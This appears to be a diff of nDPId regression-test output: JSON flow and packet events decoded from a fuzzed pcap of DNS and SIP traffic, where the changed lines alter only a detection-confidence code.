00397{"packet_event_id":1,"packet_event_name":"packet","packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtSm4lcwBFAABEasIAAIARTJPAqAECwKgBAQrLADUAMHT6r\/kAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1120470233792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470233792,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CssAR1d2r\/mAAAAmcwEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAYAAJxAACwlsb2NhbGhvc3QA"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":38,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":38,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2176,"global_ts_msec":1120470233794} 01441{"packet_event_id":1,"packet_event_name":"packet","packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":2176,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"thread_ts_msec":1120470233792,"pkt":"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"} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1120470233796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470233796,"pkt":"ADBUADRWAODtAW69CABFAABIasQAAIARTI3AqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470234292} 01442{"packet_event_id":1,"packet_event_name":"packet","packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"thread_ts_msec":1120470233796,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1120470234792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470234792,"pkt":"ADBUADRWAODtAW69CABFAABIasYAAIARTIvAqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470236795,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1120470236795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470236795,"pkt":"ADBUADRWAODtAW69CABFAABIaskAAIARTIjAqAECqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1120470238798,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470238798,"pkt":"ADBUADRWAODtAW69CABFAABIasoAAIARTIfAqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzDXAJY0liZXJjaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470233796,"flow_last_seen":1120470238798,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470238798,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.s?p.cibercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470233796,"flow_last_seen":1120470238798,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470238798,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.s?p.cibercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470032178,"flow_last_seen":1120470041184,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469635127,"flow_last_seen":1120469697466,"flow_idle_time":620000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1120470250805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470250805,"pkt":"ADAlcwBWAODtAW69CABFAABEaswAAIARTInAqAFuwKgBAQrNADUAMLv0aP0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1120470250807,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470250807,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cs0AR55waP2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyhGFycGEAAAwAAcAMAAwAJXMAJxAAawlsb2NhbGhvc3QA"} 
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
